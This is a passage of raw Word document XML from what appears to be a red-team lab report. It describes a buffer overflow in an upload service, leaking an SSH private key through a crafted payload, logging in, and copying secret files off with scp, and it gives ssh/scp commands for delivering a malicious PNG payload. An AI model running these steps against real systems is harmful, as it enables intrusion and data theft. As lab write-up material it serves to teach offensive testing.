      <w:r w:rsidR="00445554" w:rsidRPr="00445554">
        <w:t>After examining the script and its corresponding binaries, it was discovered that weak input validation had let user-supplied data exceed the buffer capacity allotted. This vulnerability showed a visible chance to provide malicious input that may cause a buffer overflow and perhaps give the attacker unauthorized access to the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E78E60" w14:textId="3D0F1D43" w:rsidR="00A27615" w:rsidRDefault="00136BD8" w:rsidP="000C5348">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="07E25AE6" wp14:editId="0790799A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3856899</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4011930" cy="370114"/>
                <wp:effectExtent l="19050" t="19050" r="26670" b="11430"/>
                <wp:wrapNone/>
                <wp:docPr id="56117694" name="Rectangle 1"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4011930" cy="370114"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="28575">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C03021" id="Rectangle 1" o:spid="_x0000_s1026" style="position:absolute;margin-left:0;margin-top:303.7pt;width:315.9pt;height:29.15pt;z-index:251667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" filled="f" strokecolor="#c00000" strokeweight="2.25pt">
                <w10:wrap anchorx="margin"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E260032" w14:textId="32E241C0" w:rsidR="00677774" w:rsidRDefault="00677774" w:rsidP="000C5348"/>
    <w:p w14:paraId="0D9B4F5A" w14:textId="05E80F9C" w:rsidR="008515BA" w:rsidRDefault="008515BA">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC50DA9" w14:textId="5B3B23E3" w:rsidR="008515BA" w:rsidRDefault="008515BA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Crash Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0487F872" w14:textId="25605976" w:rsidR="00126EBE" w:rsidRPr="00126EBE" w:rsidRDefault="00126EBE" w:rsidP="00126EBE">
      <w:r w:rsidRPr="00126EBE">
        <w:t>The target server crashed due to a segmentation fault after the file was uploaded. To verify that I had taken control of the program's execution flow, I looked at the core dump to examine the rewritten memory and verified that the Instruction Pointer (RIP) had been replaced with 0x41414141 (AAAA).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DBB430" w14:textId="77777777" w:rsidR="00126EBE" w:rsidRDefault="00126EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E3042DF" w14:textId="6A865C07" w:rsidR="00F8525B" w:rsidRDefault="00F8525B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploit Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6082CFE1" w14:textId="278715A3" w:rsidR="00F8525B" w:rsidRPr="00F8525B" w:rsidRDefault="00F8525B" w:rsidP="00F8525B">
      <w:r w:rsidRPr="00F8525B">
        <w:t xml:space="preserve">Remotely activated the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F8525B">
        <w:t>print_ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F8525B">
        <w:t>() function by uploading the malicious payload using the same upload technique. The SSH private key was then obtained for additional access when the server displayed it on the screen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB54636" w14:textId="77777777" w:rsidR="00F8525B" w:rsidRPr="008515BA" w:rsidRDefault="00F8525B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32AB8AD3" w14:textId="189DC59C" w:rsidR="00677774" w:rsidRDefault="008515BA" w:rsidP="000C5348"/>
    <w:p w14:paraId="3E89E08D" w14:textId="4A78512C" w:rsidR="00F8525B" w:rsidRDefault="002012FF" w:rsidP="000C5348"/>
    <w:p w14:paraId="60537C78" w14:textId="7DDAF390" w:rsidR="000570A6" w:rsidRDefault="000570A6" w:rsidP="000C5348"/>
    <w:p w14:paraId="14BBAAD5" w14:textId="44E09FCB" w:rsidR="00FA6A92" w:rsidRDefault="00FA6A92" w:rsidP="000C5348">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA6A92">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SSH PRIVATE KEY RETRIEVED AND SAVED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52661950" w14:textId="77777777" w:rsidR="001E7791" w:rsidRPr="001E7791" w:rsidRDefault="001E7791" w:rsidP="001E7791">
      <w:r w:rsidRPr="001E7791">
        <w:t xml:space="preserve">Saved the SSH key in </w:t>
      </w:r>
      <w:r w:rsidRPr="001E7791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sample.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="001E7791">
        <w:t xml:space="preserve"> using nano and connected to the target with ssh. Navigated to the </w:t>
      </w:r>
      <w:r w:rsidRPr="001E7791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SECRETS</w:t>
      </w:r>
      <w:r w:rsidRPr="001E7791">
        <w:t xml:space="preserve"> folder and listed confidential .txt and .pdf files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD0C00F" w14:textId="66836ECB" w:rsidR="00FA6A92" w:rsidRDefault="001E7791" w:rsidP="000C5348">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77741161" w14:textId="77777777" w:rsidR="001E7791" w:rsidRDefault="001E7791" w:rsidP="000C5348">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6627580B" w14:textId="7D3D8396" w:rsidR="005E505C" w:rsidRDefault="005E505C" w:rsidP="000C5348">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SSH ACCESS ESTABLISHED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5116AA5E" w14:textId="77777777" w:rsidR="00510716" w:rsidRPr="00510716" w:rsidRDefault="00510716" w:rsidP="00510716">
      <w:r w:rsidRPr="00510716">
        <w:t xml:space="preserve">All files from the target server's SECRETS directory were safely copied to the local computer using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00510716">
        <w:t>scp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00510716">
        <w:t xml:space="preserve"> and sample.txt. successfully recovered several private .txt and.pdf files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D638FA" w14:textId="268629EF" w:rsidR="00BF75CF" w:rsidRDefault="00DE105E" w:rsidP="000C5348"/>
    <w:p w14:paraId="2710BFAC" w14:textId="77777777" w:rsidR="00792E1B" w:rsidRDefault="00792E1B"/>
    <w:p w14:paraId="0D9EBF70" w14:textId="77777777" w:rsidR="00704EEB" w:rsidRDefault="00792E1B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SECRET FILE EXFILTRATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653B8EA7" w14:textId="3481BE1F" w:rsidR="00476623" w:rsidRDefault="00704EEB">
      <w:r w:rsidRPr="00704EEB">
        <w:t xml:space="preserve">Using the command </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00704EEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>scp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00704EEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00704EEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00704EEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> sample.txt</w:t>
      </w:r>
      <w:r w:rsidR="00815735">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00704EEB">
        <w:t>developer@35.212.42.88:/home/developer/SECRETS/SECRET_*, the SECRET files were successfully copied to the Kali.</w:t>
      </w:r>
      <w:r w:rsidR="00476623">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="00501F02" w14:textId="1D92C8C3" w:rsidR="009579F3" w:rsidRDefault="009579F3" w:rsidP="008A2196">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc206031377"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">OBJECTIVE 3: DEVELOPING </w:t>
      </w:r>
      <w:r w:rsidR="00043C61">
        <w:t>OUR OWN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EXPLOITS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="406AD320" w14:textId="6E790928" w:rsidR="00617DE6" w:rsidRPr="00617DE6" w:rsidRDefault="00617DE6" w:rsidP="00617DE6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Shellcode Development </w:t>
      </w:r>
      <w:r w:rsidR="00414478">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nd Reverse Shell (Malicious PNG)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F19AF9B" w14:textId="7D2022BD" w:rsidR="00476623" w:rsidRDefault="0011150F" w:rsidP="000C5348">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7431FD0E" w14:textId="65E6657C" w:rsidR="00AB6D5C" w:rsidRDefault="0033502A" w:rsidP="00AB6D5C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>autosolver_payload.nasm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380FED48" w14:textId="560EC0E4" w:rsidR="0033502A" w:rsidRDefault="0033502A" w:rsidP="00AB6D5C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EC7AEC9" w14:textId="0D892A37" w:rsidR="005327A7" w:rsidRDefault="005327A7" w:rsidP="00AB6D5C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64AFB83A" w14:textId="443B7A97" w:rsidR="005327A7" w:rsidRPr="0033502A" w:rsidRDefault="005327A7" w:rsidP="00AB6D5C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="106FE3F2" w14:textId="132FE548" w:rsidR="00AB6D5C" w:rsidRDefault="00E6102A" w:rsidP="00E6102A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6102A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E6102A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 600 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E6102A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>id_rsa_private</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="18353FC4" w14:textId="4DDBFA66" w:rsidR="009C6109" w:rsidRPr="00E6102A" w:rsidRDefault="009C6109" w:rsidP="00E6102A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C6109">
        <w:t>This command sets the SSH private key’s permissions to 600, allowing only the owner to read and write it. This is essential, as SSH rejects keys accessible to others, ensuring secure and proper remote access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A18CC8" w14:textId="61398C4A" w:rsidR="00E6102A" w:rsidRDefault="001D7AFA" w:rsidP="00E6102A"/>
    <w:p w14:paraId="7C5F1AC3" w14:textId="36B2E618" w:rsidR="009C6109" w:rsidRDefault="009C6109" w:rsidP="00E6102A"/>
    <w:p w14:paraId="71C860FC" w14:textId="2729801F" w:rsidR="00EA2790" w:rsidRPr="00EA2790" w:rsidRDefault="00EA2790" w:rsidP="00EA2790">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA2790">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>echo -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA2790">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>en</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA2790">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> “\x05” &gt; file.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69561CE7" w14:textId="696FF872" w:rsidR="00EA2790" w:rsidRPr="00EA2790" w:rsidRDefault="00EA2790" w:rsidP="00EA2790">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA2790">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">cat file.txt </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA2790">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>autosolver_payload.bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA2790">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA2790">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>png_candidate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="66C49CFC" w14:textId="53426A78" w:rsidR="00EA2790" w:rsidRPr="00EA2790" w:rsidRDefault="00EA2790" w:rsidP="00EA2790">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA2790">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>scp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA2790">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA2790">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA2790">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA2790">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>id_rsa_private</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA2790">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA2790">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>StrictHostKeyChecking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00501D2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">=no </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00501D2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>png_candidate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00501D2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> developer@35.212.42.88:~/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B32C952" w14:textId="16A7C58B" w:rsidR="00EA2790" w:rsidRDefault="001454A6" w:rsidP="00E6102A"/>
    <w:p w14:paraId="30E3484D" w14:textId="77777777" w:rsidR="00FE7E33" w:rsidRDefault="00FE7E33" w:rsidP="00E6102A"/>
    <w:p w14:paraId="3CEB82F6" w14:textId="30FFBB90" w:rsidR="00FE7E33" w:rsidRDefault="00FE7E33" w:rsidP="00E6102A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE7E33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ssh -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE7E33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE7E33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE7E33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>id_rsa_private</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE7E33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE7E33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>StrictHostKeyChecking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE7E33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>=no developer@35.212.42.88 "./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE7E33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>png_create_helper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE7E33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -input </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE7E33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>png_candidate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE7E33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -h 1 -w 70 -output png_submission.png"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D39837" w14:textId="04AC7775" w:rsidR="00647348" w:rsidRPr="00647348" w:rsidRDefault="00647348" w:rsidP="00E6102A">
      <w:r w:rsidRPr="00647348">
        <w:t>This command establishes a secure SSH connection to a local computer (35.212.42.88) using a private key (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00647348">
        <w:t>id_rsa_private</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00647348">
        <w:t xml:space="preserve">). It is used often in Red Team operations to get access to target or staging servers </w:t>
      </w:r>
      <w:r w:rsidR="00A34755" w:rsidRPr="00647348">
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidRPr="00647348">
        <w:t xml:space="preserve"> perform post-exploitation tools such as autosolve.sh or modify payloads for exfiltration (such as into png_submission.png).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DC9627" w14:textId="3B2A1CEA" w:rsidR="00FE7E33" w:rsidRDefault="00805746" w:rsidP="00E6102A"/>
    <w:p w14:paraId="4B5FB6D3" w14:textId="77777777" w:rsidR="00834B6E" w:rsidRDefault="00834B6E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F99A1D" w14:textId="02EFFA3D" w:rsidR="003F4213" w:rsidRDefault="00834B6E" w:rsidP="00E6102A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00834B6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>udo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00834B6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00834B6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00834B6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> start ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6AE685" w14:textId="00D5A050" w:rsidR="0068098E" w:rsidRPr="0068098E" w:rsidRDefault="0068098E" w:rsidP="00E6102A">
      <w:r w:rsidRPr="00834B6E">
        <w:t>Kali may function as a server by starting the SSH service, which permits inside connections such as file transfers and reverse shells. In red team situations, it's important for data exfiltration or maintaining access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D46AA1" w14:textId="59655B25" w:rsidR="00834B6E" w:rsidRDefault="00834B6E" w:rsidP="00E6102A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23C6718A" w14:textId="79B47D13" w:rsidR="00001E5F" w:rsidRPr="00001E5F" w:rsidRDefault="00001E5F" w:rsidP="00E6102A">
      <w:r w:rsidRPr="00001E5F">
        <w:t xml:space="preserve">To safely transfer files from an external machine (administrator@10.0.0.4) to the local system, use the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00001E5F">
        <w:t>scp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00001E5F">
        <w:t xml:space="preserve"> command. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1824D78D" w14:textId="36ED1363" w:rsidR="003F4213" w:rsidRDefault="00950217" w:rsidP="00E6102A"/>
    <w:p w14:paraId="24AD7F4F" w14:textId="22FCEB1D" w:rsidR="00FB11D9" w:rsidRDefault="00FB11D9">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6C9DE6" w14:textId="251A2E6A" w:rsidR="00CA5AEB" w:rsidRDefault="00CA5AEB" w:rsidP="00E6102A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5AEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>./exfiltrate commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11ABDE9E" w14:textId="386D6CF1" w:rsidR="00034AE5" w:rsidRPr="00034AE5" w:rsidRDefault="00034AE5" w:rsidP="00E6102A">
      <w:r w:rsidRPr="00034AE5">
        <w:t xml:space="preserve">These./exfiltrate commands test how well defenses </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00034AE5">
        <w:t>are able to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00034AE5">
        <w:t xml:space="preserve"> detect and prevent data theft by simulating unauthorized removal of sensitive files. The exercise illustrates the necessity of strong access restrictions, monitoring, and endpoint security to prevent real-world intrusions, and the files represent important business information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551C06EA" w14:textId="2F42218A" w:rsidR="00FB11D9" w:rsidRDefault="00FB11D9" w:rsidP="00E6102A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63B8667F" w14:textId="77777777" w:rsidR="0030679E" w:rsidRDefault="0030679E" w:rsidP="00E6102A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F6D6001" w14:textId="1183477C" w:rsidR="0030679E" w:rsidRDefault="0030679E" w:rsidP="0030679E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc206031378"/>
      <w:r>
        <w:t>OBJECTIVE 4: WELCOME TO THE ENVIRONMENT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="342C6212" w14:textId="473639F4" w:rsidR="00996FAD" w:rsidRDefault="00996FAD" w:rsidP="00996FAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
